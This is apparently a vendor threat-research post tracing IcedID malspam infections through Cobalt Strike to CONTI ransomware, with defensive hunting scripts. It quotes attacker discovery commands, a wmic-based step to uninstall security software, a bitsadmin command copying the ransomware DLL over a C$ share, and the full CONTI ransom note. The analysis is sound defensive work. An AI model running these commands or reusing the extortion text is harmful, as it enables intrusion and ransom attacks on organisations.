Cynet’s research and CyOps groups are constantly working to better understand and discover additional angles threat actors might use when trying to compromise our customers. This translates into ongoing analysis of banking trojan malware variants such as the infamous Emotet, Ursnif (A.K.A. Gozi), Trickbot and Dridex, and of the tactics, techniques, and procedures (TTPs) of the threat actors behind them.
The data and findings below were derived directly from Cynet client environments and research labs. If you suspect that your devices may be infected with any of the malware described below, please reach out directly to Cynet for help with evaluation and incident response. Cynet’s MDR team, CyOps, is available 24×7 and ready to help you begin threat hunting.
IcedID (A.K.A. BokBot; MITRE ID: S0483) was first seen in September 2017 and is classified as a banking trojan designed to target financial sectors in the U.S. and Europe, allowing threat actors to steal financial information, banking credentials, and payment information using web injection and browser hooking techniques.
From 2017 to 2021, the IcedID threat groups used multiple attack techniques and upgraded the range of malicious capabilities to evade detection and deploy massive attack campaigns. They remodeled the MO (modus operandi) into a downloader malware, expanding its capabilities beyond a banking trojan to enable the distribution of sophisticated threats such as Cobalt Strike Beacons and ransomware such as MAZE, EGREGOR, Sodinokibi, and CONTI.
With this change, IcedID became part of the Malware-as-a-Service (MaaS) – organized cybercrime.
The TA551 and LUNAR SPIDER threat groups are classified as eCrime groups whose primary motivation is targeting financial organizations. These eCrime groups are associated with various malware, including IcedID, Qakbot, Ursnif, and Valak. The unique pattern of these groups lies in their kill chain: weaponized Office documents (Excel and Word), usually contained in a password-protected zip file and distributed via malspam campaigns through email, which download or drop malware (in most cases in the form of DLL payloads).
We suspect that the LUNAR SPIDER and WIZARD SPIDER are related as we observed these groups coordinating the distribution of each other’s malware. For example, we observed a LUNAR SPIDER (IcedID) malspam campaign that drops WIZARD SPIDER malware Trickbot. Our recent observations suggest that IcedID infection includes CONTI ransomware which is related to the WIZARD SPIDER threat group.
IcedID (BokBot) overview
Spear phishing attachment distribution via malspam campaigns (zipped, weaponized Microsoft office documents)
User execution via enabling macros
DLL download from C2 server
Loader DLL execution via rundll32\regsvr32; LOLbins (Living Off the Land Binaries)
Fingerprinting and enumeration of the compromised machine
C2 server connection, send initial information
Initial access for sophisticated threats (downloader activity)
IcedID seems to be one of the most trending malware families, taking the place of the infamous Emotet, “the world’s most dangerous malware.” Emotet was taken down at the end of January 2021 by a major law enforcement operation coordinated between multiple authorities including Europol, the FBI, and the UK’s National Crime Agency, along with agencies from Canada, France, Germany, Lithuania, the Netherlands, and Ukraine.
In recent months, Cynet 360 observed a high number of IcedID infections utilizing Cobalt Strike Beacons and finally attempting to impact the domain with CONTI ransomware.
CONTI (MITRE ID: S0575) is a new ransomware observed in the wild and has become a new target for the FBI. On May 20, 2021 the FBI released an article discussing the impact of Conti ransomware on healthcare, law enforcement agencies, and emergency medical services in the US. The CONTI group operates as Ransomware-as-a-Service (RaaS) affiliated with the “Wizard Spider” threat group. CONTI ransomware was first seen at the end of 2020. We have recently observed CONTI targeting the US and Europe. The NCSC (National Cyber Security Centre) has participated in recent CONTI infection investigations.
Cynet360 autonomous breach protection platform detects and prevents the IcedID kill chain.
Cynet’s CyOps and Research teams have recently responded to several incidents at organizations where the Cynet360 platform was not deployed, in which an IcedID infection eventually impacted the compromised domain with CONTI ransomware.
The initial access vector in these cases was a malspam campaign delivering a malicious email containing a zipped file, followed by a weaponized Office document downloading the IcedID malware. The IcedID malware, in turn, launched a Cobalt Strike beacon on the compromised machine that executed discovery actions on the domain while abusing legitimate Windows binaries.
The next steps of the infection included privilege escalation and lateral movement activities. Once the attackers established persistence on the domain, a CONTI ransomware variant was dropped.
The infection chain of IcedID begins with an email vector: spear-phishing emails.
The emails, sent in phishing campaigns, carry either a weaponized Microsoft Office document (MS Word or Excel spreadsheet) or a password-protected zip file containing the weaponized document; opening it leads to the execution of multi-stage malicious actions.
Example weaponized Microsoft Office document requesting the user to activate macros:
Magic: PE32+ executable for MS Windows (DLL) (GUI) Mono/.Net assembly
By setting breakpoints on the VirtualAlloc API, we unpacked the IcedID payload. An allocated memory section is created (zero-filled) and the unpacked payload is written into this section.
The below section is responsible for the unpacking routine:
The memory page of the unpacked IcedID has ERW (Execute, Read, Write) protection.
The dumped IcedID file contains various HTTP APIs. Using IDA we can observe the use of the HTTP APIs in the code.
The IcedID loader retrieves information by performing initial enumeration and fingerprinting on the compromised host and sends the information to the command-and-control server. The information includes the OS version and physical address, sent in an encoded cookie.
Example of cookie names and order:
_gat= OS version
_u= Computer name and the username
__io= User SID
Hunting tip: an outbound connection carrying the above cookie data could be an indicator of IcedID activity.
The CPU ID check, stored in the _ga:
The OS version check, stored in the _gat:
The user SID check, stored in _io:
Username and Computer name check stored in _U:
Adapter Info check, stored in the _gid:
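The hunting tip above can be turned into a log check. The script below is an added example (not Cynet’s code): it parses constructed proxy log lines and flags hosts whose outbound requests carry the IcedID fingerprint cookie set (_gat, _ga, _gid, _u, __io, with the _U and _io variants folded in). The log line format and the hex-value check are assumptions of this example.

```python
import re
from typing import Dict, List

# Cookie names IcedID uses to carry host fingerprint data (from the analysis
# above). The samples also show the spelling variants _U and _io.
ICEDID_COOKIE_NAMES = frozenset({"_gat", "_ga", "_gid", "_u", "__io"})


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into a dict, folding _U -> _u and _io -> __io."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        name = name.strip().lower()
        if name == "_io":
            name = "__io"
        if name:
            cookies[name] = value.strip()
    return cookies


def is_icedid_fingerprint(cookie_header: str) -> bool:
    """True when every IcedID fingerprint cookie is present and each value is a
    hex string. Genuine Google Analytics _ga cookies look like
    GA1.2.<digits>.<digits>, so the hex check (an assumption of this example)
    separates the look-alike names from real analytics traffic."""
    cookies = parse_cookie_header(cookie_header)
    if not ICEDID_COOKIE_NAMES.issubset(cookies):
        return False
    return all(re.fullmatch(r"[0-9a-fA-F]{4,}", cookies[n]) is not None
               for n in ICEDID_COOKIE_NAMES)


# Constructed proxy log lines: "<time> <host> <method> <url> cookie=<Cookie header>"
SAMPLE_PROXY_LOG = [
    "10:01:02 WS01 GET http://www.example-shop.test/ cookie=_ga=GA1.2.1234567890.1620000000; _gid=GA1.2.987654321.1620000000",
    "10:01:09 WS01 GET http://c2-placeholder.test/ cookie=_gat=0a1b2c3d4e5f; _ga=deadbeef0001; _u=cafe0001beef; __io=0123456789ab; _gid=abcdef012345",
    "10:02:15 WS02 GET http://c2-placeholder.test/ cookie=_gat=0a1b2c3d4e5f; _ga=deadbeef0002; _U=cafe0002beef; _io=0123456789ac; _gid=abcdef012346",
    "10:03:00 WS03 GET http://www.example-shop.test/ cookie=_gat=zz; _ga=1234; _gid=5678; _u=abcd; __io=ef01",
]


def hunt_icedid_beacons(lines: List[str]) -> List[str]:
    """Return the hosts whose outbound requests carry the IcedID cookie fingerprint."""
    hits = []
    for line in lines:
        m = re.match(r"^\S+ (\S+) \S+ \S+ cookie=(.*)$", line)
        if m and is_icedid_fingerprint(m.group(2)):
            hits.append(m.group(1))
    return hits
```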
IcedID communicating with the C2 server and sending the enumerated data, as found in memory:
After the execution of the first-stage loader, the C2 server responds with a fake GZIP payload: an encrypted IcedID payload that is downloaded from the C2 server and executed via rundll32.exe.
After the execution of license.dat, the post-infection stage uses dynamic injection behavior related to a Cobalt Strike beacon, allowing the threat actor groups to gain full remote control over the compromised machine.
The above script is base64 encoded and also compressed with a GzipStream. By decoding the base64 and decompressing the GzipStream with gunzip, we observed the final stage of the PowerShell script.
Back to the IcedID use case: several commands used by the Cobalt Strike session for discovery were detected.
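The decoding step described above, written as an added analysis helper (not Cynet’s code): it pulls the FromBase64String argument out of a script, checks for the gzip magic bytes, decompresses the layer, and repeats until no further layer is found. The sample stager is constructed here around a harmless inner script; the wrapper form is a simplification assumed for this example.

```python
import base64
import gzip
import re
from typing import Optional, Tuple

# Matches the base64 argument the stager passes to [Convert]::FromBase64String.
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def decode_gzip_b64_layer(script: str) -> Optional[str]:
    """Return the script hidden in one base64+GzipStream layer, or None if the
    text carries no such layer (no base64 argument, or data is not gzip)."""
    m = B64_ARG.search(script)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":  # gzip magic; GzipStream output starts with it
        return None
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def peel_stager(script: str, max_layers: int = 5) -> Tuple[str, int]:
    """Decode nested layers until none remain; returns (innermost script, layers)."""
    layers = 0
    while layers < max_layers:
        inner = decode_gzip_b64_layer(script)
        if inner is None:
            break
        script, layers = inner, layers + 1
    return script, layers


def build_sample_stager(inner: str) -> str:
    """Constructed sample only: wrap a script in one base64+gzip layer."""
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    return "$data = [Convert]::FromBase64String('" + blob + "')"


# Constructed input: a harmless script wrapped in two nested layers.
INNER = "Write-Host 'decoded stage (constructed sample)'"
SAMPLE = build_sample_stager(build_sample_stager(INNER))
```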
Discovery – TA0007
“The adversary is trying to figure out your environment.
Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.”
nltest /domain_trusts /all_trusts
net view /all /domain
wmic product get name,version
The above discovery command lists the applications installed on the host. We have observed threat actors using this command to discover which security applications they are dealing with.
The following command prints the installation package.
wmic product where "Name like '%Security Application%'" get Name, IdentifyingNumber
After that, an attempt was made to uninstall the security application via the msiexec command:
We have also observed privilege escalation in cases of Cobalt Strike activity by IcedID actors. The privilege escalation was achieved by GetSystem named pipe impersonation to gain SYSTEM-level privileges.
Hunting tip: the above pattern of the GetSystem command could help detect a privilege escalation attempt via named pipe. Also, the cmd command executes via the services.exe process, which could be a second indicator.
“Technique 1 creates a named pipe from Meterpreter. It also creates and runs a service that runs cmd.exe /c echo “some data” >\\.\pipe\. When the spawned cmd.exe connects to Meterpreter’s named pipe, Meterpreter can impersonate that security context. Impersonation of clients is a named pipes feature. The context of the service is SYSTEM, so when you impersonate it, you become SYSTEM.” – Cobalt Strike
After the threat actors enumerated the compromised host, mapped the domain, disabled the security applications and gained SYSTEM privileges, the impact action is ready.
Final stage – CONTI infection
For the lateral movement and distribution of CONTI ransomware, threat actors used C$ share.
bitsadmin /transfer debjob /download /priority normal \\*\C$\Windows\md.dll C:\Windows\ GROUP_x86.dll
The above command is a LOLBin abuse of bitsadmin (the tool for managing Background Intelligent Transfer Service jobs), allowing the CONTI ransomware DLL to be copied over the C$ share.
The execution method used to execute the CONTI DLL was regsvr32 command.
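The two hunting points above (the GetSystem named-pipe pattern with cmd.exe under services.exe, and bitsadmin staging over a C$ share followed by regsvr32 execution) as one added triage script. This is example code, not Cynet’s; the process events, field names (host, parent, image, cmdline) and the hostname FILESRV01 are constructed for the example, and the bitsadmin matcher is a simplification.

```python
import re
from typing import Dict, List, Set, Tuple

# Pattern 1: GetSystem named-pipe impersonation. cmd.exe launched by
# services.exe echoes data into \\.\pipe\<name> (see the Cobalt Strike quote).
PIPE_ECHO = re.compile(r"echo\b.*>\s*\\\\\.\\pipe\\", re.IGNORECASE)
# Pattern 2: bitsadmin pulling a file from a remote C$ share; group(1) is the
# local destination path. Simplified matcher assumed for this example.
BITS_FROM_C_SHARE = re.compile(
    r"bitsadmin.*?/transfer.*?/download.*?\\\\[^\\\s]+\\C\$\\\S+\s+(\S+)", re.IGNORECASE)

Event = Dict[str, str]  # assumed fields: host, parent, image, cmdline


def find_getsystem(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (host, cmdline) for cmd.exe children of services.exe echoing to a pipe."""
    hits = []
    for e in events:
        if (e["parent"].lower().endswith("services.exe")
                and e["image"].lower().endswith("cmd.exe")
                and PIPE_ECHO.search(e["cmdline"])):
            hits.append((e["host"], e["cmdline"]))
    return hits


def find_admin_share_staging(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (host, dll_path) where bitsadmin staged a file from a C$ share and a
    later regsvr32 on the same host referenced that path (events in time order)."""
    staged: Set[Tuple[str, str]] = set()
    hits = []
    for e in events:
        cmdline = e["cmdline"]
        m = BITS_FROM_C_SHARE.search(cmdline)
        if m:
            staged.add((e["host"], m.group(1).lower()))
        elif e["image"].lower().endswith("regsvr32.exe"):
            for host, path in staged:
                if host == e["host"] and path in cmdline.lower():
                    hits.append((host, path))
    return hits


# Constructed events (not from a real incident): one benign echo, then the chain.
SAMPLE_EVENTS: List[Event] = [
    {"host": "WS01", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo hello > C:\Temp\out.txt"},
    {"host": "WS01", "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo 3f1c2a > \\.\pipe\3f1c2a"},
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer debjob /download /priority normal \\FILESRV01\C$\Windows\md.dll C:\Windows\GROUP_x86.dll"},
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\GROUP_x86.dll"},
]
```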
The threat actors executed the shadow copy deletion commands manually in most cases, through bat files. Deleting shadow copies outside the ransomware functionality itself is a new development in recent incidents. We suspect that this action was performed manually to impede the detection of the inhibit-recovery technique: in this execution method the shadow copy deletion commands are not directly tied to the ransomware activity and could resemble legitimate activity originating from administrators and 3rd party applications.
CONTI utilizes Windows Restart Manager to ensure the data files are ready for encryption and there is no opened handle to the targeted files by other processes, and if so, the CONTI ransomware terminates these processes. The same technique is used by Sodinokibi (A.K.A REvil) and Ryuk ransomware.
CONTI Ransomware note:
All of your files are currently encrypted by CONTI strain.
As you know (if you don’t – just “google it”), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly.
If you try to use any additional recovery software – the files might be damaged, so if you are willing to try – try it on the data of the lowest value.
To make sure that we REALLY CAN get your data back – we offer you to decrypt 2 random files completely free of charge.
You can contact our team directly for further instructions through our website :
TOR VERSION :
(you should download and install TOR browser first https://torproject.org)
YOU SHOULD BE AWARE!
Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on our news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.
The CONTI group recently started using a “double extortion” technique, threatening victims that the exfiltrated data will be publicly leaked. This is a new trend amongst threat actors that used to focus ransomware campaigns and attacks solely on data encryption, but have evolved and created an additional leverage and source of income.